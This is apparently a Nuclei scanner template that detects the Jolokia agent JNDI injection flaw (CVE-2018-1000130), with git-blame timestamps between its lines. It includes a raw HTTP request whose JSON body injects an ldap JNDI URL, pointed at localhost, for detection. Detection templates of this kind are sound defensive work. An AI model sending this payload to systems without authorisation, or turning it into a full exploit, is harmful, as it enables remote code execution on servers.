2021-06-22 12:32:30 +00:00
id : CVE-2018-1000130
info :
2022-06-19 15:28:13 +00:00
name : Jolokia Agent - JNDI Code Injection
2021-06-22 12:32:30 +00:00
author : milo2012
severity : high
2022-06-20 15:55:26 +00:00
description : |
2023-07-11 19:49:27 +00:00
Jolokia agent is vulnerable to a JNDI injection vulnerability that allows a remote attacker to run arbitrary Java code on the server when the agent is in proxy mode.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability can lead to remote code execution, compromising the affected system.
2023-09-06 12:57:14 +00:00
remediation : |
Apply the latest security patches or updates provided by the vendor to fix the vulnerability.
2022-04-22 10:38:41 +00:00
reference :
- https://jolokia.org/#Security_fixes_with_1.5.0
- https://access.redhat.com/errata/RHSA-2018:2669
2022-06-19 15:28:13 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-1000130
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 8.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-1000130
cwe-id : CWE-74
2023-08-31 11:46:18 +00:00
epss-score : 0.89191
2023-12-12 11:07:52 +00:00
epss-percentile : 0.98455
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:a:jolokia:webarchive_agent:1.3.7:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : jolokia
product : webarchive_agent
tags : cve,cve2018,jolokia,rce,jndi,proxy
2021-06-22 12:32:30 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-06-22 12:32:30 +00:00
- raw :
- |
POST /jolokia/read/getDiagnosticOptions HTTP/1.1
Host : {{Hostname}}
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.
Content-Type : application/x-www-form-urlencoded
{
2021-09-08 12:17:19 +00:00
"type" : "read" ,
"mbean" : "java.lang:type=Memory" ,
"target" : {
"url" : "service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat"
}
2021-06-22 12:32:30 +00:00
}
2021-06-22 16:33:06 +00:00
matchers-condition : and
2021-06-22 12:32:30 +00:00
matchers :
- type : word
2022-06-20 15:55:26 +00:00
part : body
2021-06-22 12:32:30 +00:00
words :
- "Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"
2021-09-08 12:17:19 +00:00
2021-06-22 12:32:30 +00:00
- type : status
status :
2021-06-22 16:33:06 +00:00
- 200
2023-12-12 12:02:03 +00:00
# digest: 4a0a00473045022035a0bf9da6b8b4de17fcd9f11365bce2088f366b6b86ce6ddf95008854116605022100b0fe3f9730815621d2d2da4ceae45c57b4e7cd2c6ba72fd27caa0624206f0d7e:922c64590222798bb761d5b6d8e72950